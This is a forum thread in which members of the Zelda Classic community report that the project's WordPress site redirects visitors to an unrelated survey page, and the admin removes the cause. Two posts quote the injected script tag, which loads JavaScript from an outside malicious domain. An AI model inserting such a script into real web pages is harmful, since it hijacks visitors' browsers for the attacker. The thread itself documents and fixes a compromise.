PDA

View Full Version : Seeing the ZC main-site getting affected by a redirect to an unrelated site.



awab4444
09-07-2019, 11:29 AM
(If you don't count forum games, I literally haven't posted since about March of 2017 when I reported a common bug in ZC when working in non-Latin Alphabet computers)

Today, I have seen that after going to "zeldaclassic.com" (Zelda Classic's official site) it was affected by a redirect to a survey site that is quite unrelated to Zelda (as in both the offical Nintendo games made since 1986, and this user-generated fan-game created in the 29th of December, 1999) in any form. Fortunately, The Armageddon Games Network forums and the Zelda Classic Wiki (which is developed from PureZC's now-extinct wiki) are not affected by this redirect.

You can also tell me if this site works just as fine to you or not :D.

Chris Miller
09-07-2019, 12:34 PM
Hmm, I checked it on a few browsers, but zeldaclassic.com works just fine for me. I'll ask everyone in the Discord to try it as well.

EDIT: Ok, it seems that some people are being redirected, some aren't, and it's slow af for others.

EDIT2: I think I found the issue. War Lord I PMed you what we've found.

Saffith
09-07-2019, 12:37 PM
I'm seeing it, too. Looks like this: https://www.wordfence.com/blog/2019/08/malicious-wordpress-redirect-campaign-attacking-several-plugins/

From zeldaclassic.com's source:

</div> <!-- .et_pb_text -->
</div> <!-- .et_pb_column -->
</div> <!-- .et_pb_row -->
</div> <!-- .et_pb_section --><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script></p>
</div>

BFeely
09-07-2019, 12:38 PM
armgeddongames.com has a certificate error.

Chris Miller
09-07-2019, 12:41 PM
I'm seeing it, too. Looks like this: https://www.wordfence.com/blog/2019/08/malicious-wordpress-redirect-campaign-attacking-several-plugins/

From zeldaclassic.com's source:

</div> <!-- .et_pb_text -->
</div> <!-- .et_pb_column -->
</div> <!-- .et_pb_row -->
</div> <!-- .et_pb_section --><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script></p>
</div>

Yep, that's the one. I didn't notice at first because NoScript was blocking it. I've PMed War Lord.

War Lord
09-07-2019, 02:27 PM
Looking into this.
I don't think it's a hack or modified files as Wordfence would have caught it.
Contacted the host regarding the .com cert error as well.

I'll let you know what I find.

[EDIT]
Appears to actually be something that was embedded in each SQL post. I ran a query to get rid of the offending data.
I have disabled one old plugin as well as updated everything else.
I will continue to dig a bit over the weekend.
Awaiting the host to respond about the .com Cert error.

Sorry for the trouble guys, and thanks for the heads up.

Chris Miller
09-07-2019, 04:48 PM
Thanks for jumping on it so quick, man.

awab4444
09-08-2019, 11:42 AM
Thankfully, ZeldaClassic.com is now working for me.

BFeely
10-04-2019, 04:04 PM
While I personally do use WordPress on my own website I do regularly check for updates and install them. I only use plugins from the official repository and keep them updated too.